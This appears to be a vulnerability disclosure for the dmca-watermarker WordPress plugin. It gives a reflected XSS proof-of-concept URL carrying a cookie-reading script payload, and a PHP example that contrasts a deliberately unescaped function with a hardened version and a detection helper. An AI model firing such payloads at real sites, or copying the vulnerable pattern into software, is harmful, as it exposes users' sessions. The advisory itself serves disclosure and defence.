wp-plugin : dmca-watermarker – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : dmca-watermarker

Affected Version : 1.0 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/dmcawatermarker/phprack.php?plugin_dir=plugin_dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

The URL-encoded plugin_dir value decodes to plugin_dir'><script>alert(document.cookie)</script>; the leading '> indicates the parameter is reflected inside a single-quoted HTML attribute without output encoding, so the quote and bracket close that attribute and the script element that follows is rendered by the browser.

Vulnerable Parameter : plugin_dir

Trac ChangeLog :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=904684%40dmca-watermarker&old=549072%40dmca-watermarker
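The PoC above shows the plugin_dir value landing in an HTML attribute. As an added example that is not part of this advisory or of the plugin's own code, the following hypothetical PHP fragment reproduces that reflection pattern beside its hardened form, plus a small check that tells the two outputs apart; the function names, the markup and the sample value (decoded from the PoC URL) are assumptions made for the illustration.

```php
<?php
// Added illustration for this advisory; it is not the dmca-watermarker
// plugin's code. The function names and the markup are hypothetical and
// only reproduce the pattern the PoC points at: a GET parameter reflected
// into an HTML attribute without output encoding.

// Vulnerable pattern. The value is concatenated into a single-quoted
// attribute, so a value beginning with '> closes the attribute and the tag,
// and the remainder of the value is parsed as markup.
function render_plugin_dir_vulnerable(string $plugin_dir): string
{
    return "<input type='hidden' name='plugin_dir' value='" . $plugin_dir . "'>";
}

// Hardened pattern. htmlspecialchars() with ENT_QUOTES encodes <, >, &, "
// and ', so the value can no longer terminate the attribute whichever quote
// style wraps it. Inside WordPress the equivalent helper is esc_attr().
function render_plugin_dir_safe(string $plugin_dir): string
{
    $escaped = htmlspecialchars($plugin_dir, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<input type='hidden' name='plugin_dir' value='" . $escaped . "'>";
}

// Review / unit-test helper: true when the rendered fragment contains a tag
// other than the one the template itself emits.
function contains_injected_tag(string $html, string $template_tag = 'input'): bool
{
    // Collect every tag name (opening or closing) present in the output.
    preg_match_all('/<\/?([a-zA-Z][a-zA-Z0-9]*)/', $html, $matches);
    foreach ($matches[1] as $tag) {
        if (strtolower($tag) !== strtolower($template_tag)) {
            return true;
        }
    }
    return false;
}

// Constructed sample input: the URL-decoded value of the plugin_dir
// parameter from the advisory's PoC URL.
$poc = "plugin_dir'><script>alert(document.cookie)</script>";

$vulnerable = render_plugin_dir_vulnerable($poc);
$safe       = render_plugin_dir_safe($poc);

echo "Vulnerable output:\n$vulnerable\n";
echo "Injected tag present: " . var_export(contains_injected_tag($vulnerable), true) . "\n\n";

echo "Hardened output:\n$safe\n";
echo "Injected tag present: " . var_export(contains_injected_tag($safe), true) . "\n";
```

Run with `php` on the command line: the vulnerable rendering reports an injected script tag, the hardened rendering reports none because the angle brackets and quote arrive as entities. Attribute-context encoding is the fix for the reflection itself; a parameter that is supposed to name a directory should additionally be validated against the characters a path name may contain before it is used anywhere else.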

 

Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Updated on 2014-01-11

Public Disclosure : May 28, 2014

CVE Number : CVE-2014-4520

Plugin Description :

The DMCA.com WaterMarker plugin for WordPress allows you to easily integrate DMCA.com's WaterMarking for a specific folder into your WordPress site.
For more information about the features & benefits of the service visit [DMCA.com](http://www.dmca.com/protection.aspx?ad=wpo)

[» Register](http://www.dmca.com/Badges.aspx?ad=wpo) | [» Learn More](http://www.dmca.com/Protection.aspx?ad=wpo) | [» Upgrade to Pro](https://www.dmca.com/Toolkit/signup.aspx?lnk=wps&mpi=DMCA%20Toolkit)

Once installed and activated, you can use the DMCA WaterMarker page in your Dashboard's Settings Menu to specify how your choice of badge should be displayed in posts and pages. You can also choose to display your badge site-wide using the DMCA Badge Widget. You can use the badges for free but we suggest that you sign up for an account at dmca.com in order to receive the full benefit of the certified badges.
